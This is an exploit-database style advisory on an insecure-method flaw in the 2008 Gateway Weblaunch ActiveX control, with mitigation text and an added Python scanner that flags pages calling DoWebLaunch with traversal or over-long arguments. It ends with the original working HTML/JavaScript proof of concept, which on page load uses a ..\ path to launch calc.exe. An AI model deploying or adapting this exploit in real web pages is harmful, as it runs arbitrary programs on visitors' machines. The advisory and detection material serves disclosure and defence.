Vendor: Gateway Weblaunch ActiveX Control
By: e.b.
CVSS: 7.5 (HIGH)
CWE: Insecure Method Exploit
Product Name: Gateway Weblaunch ActiveX Control
Affected Version From: 1.0.0.1
Affected Version To: 1.0.0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
2008

Gateway Weblaunch ActiveX Control Insecure Method Exploit

This exploit targets the Gateway Weblaunch ActiveX Control, which is marked Safe for Scripting and Safe for Initialising, and uses its insecure DoWebLaunch method to launch arbitrary executable files. By passing a specially crafted 2nd parameter containing ..\ sequences, an attacker's web page can escape the intended directory (the user's Local Settings\Temp folder) and execute arbitrary commands on the target system. The same method is also vulnerable to a buffer overflow in its 2nd and 4th parameters. In this example, the exploit launches the Windows Calculator (calc.exe) as a proof of concept.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Gateway Weblaunch ActiveX Control to a patched version that addresses the insecure method. Additionally, users should exercise caution when interacting with untrusted websites or ActiveX controls.
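
A content-inspection check for the pattern described above, as an added example that is not part of the original advisory or exploit: it flags HTML that instantiates the control's CLSID and calls DoWebLaunch with a traversing 2nd parameter or an over-long 2nd or 4th parameter. The function names, the 260-character threshold and the sample documents are assumptions constructed for illustration.

```python
import re

# CLSID of weblaunch.ocx as it appears in the page's proof of concept.
WEBLAUNCH_CLSID = "93CEA8A4-6059-4E0B-ADDD-73848153DD5E"
MAX_ARG_LEN = 260  # assumed threshold (Windows MAX_PATH) for the overflow-prone arguments

OBJECT_RE = re.compile(r"<object\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""\b(id|classid)\s*=\s*["']?([^"'\s>]+)""", re.I)
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')

def weblaunch_ids(html):
    """Return the id of every <object> tag that instantiates the control."""
    ids = []
    for tag in OBJECT_RE.findall(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        if attrs.get("classid", "").lower() == "clsid:" + WEBLAUNCH_CLSID.lower():
            ids.append(attrs.get("id", ""))
    return ids

def scan(html):
    """Return findings for one HTML document (empty list: control not referenced)."""
    findings = []
    for obj_id in weblaunch_ids(html):
        findings.append("weblaunch control instantiated")
        if not obj_id:
            continue
        call_re = re.compile(r"\b" + re.escape(obj_id) + r"\s*\.\s*DoWebLaunch\s*\(([^)]*)\)", re.I)
        for call in call_re.finditer(html):
            # Collect the string literals and undo JavaScript's doubled backslashes.
            args = [(a or b).replace("\\\\", "\\") for a, b in STRING_RE.findall(call.group(1))]
            findings.append("DoWebLaunch called")
            if len(args) > 1 and ".." in re.split(r"[\\/]", args[1]):
                findings.append("directory traversal in 2nd parameter")
            if any(len(args[i]) > MAX_ARG_LEN for i in (1, 3) if i < len(args)):
                findings.append("over-long 2nd or 4th parameter")
    return findings

# Constructed samples (not captured traffic); the executable name is a placeholder.
SUSPICIOUS = r'''<script>function go(){ ctl.DoWebLaunch("","..\\..\\placeholder.exe","",""); }</script>
<object id="ctl" classid="CLSID:93cea8a4-6059-4e0b-addd-73848153dd5e"></object>'''
BENIGN = '<object id="v" classid="clsid:00000000-0000-0000-0000-000000000000"></object>'

if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, scan(doc))
```

Pattern matching of this kind misses script that builds the call dynamically or obfuscates it, so a hit is a lead for review and a miss is not a clean bill of health.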

Exploit-DB raw data:

<!-- 
Gateway Weblaunch ActiveX Control Insecure Method Exploit
Implemented Categories:
Category: Safe for Initialising
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, weblaunch.ocx version 1.0.0.1
This method is also vulnerable to a buffer overflow in the 2nd and 4th parameters
-->
<html>
 <head>
  <title>Gateway Weblaunch ActiveX Control Insecure Method Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
                //escape from systemdrive\documents and settings\username\local settings\temp
		obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\calc.exe","","");
          
    } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:93CEA8A4-6059-4E0B-ADDD-73848153DD5E" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-08]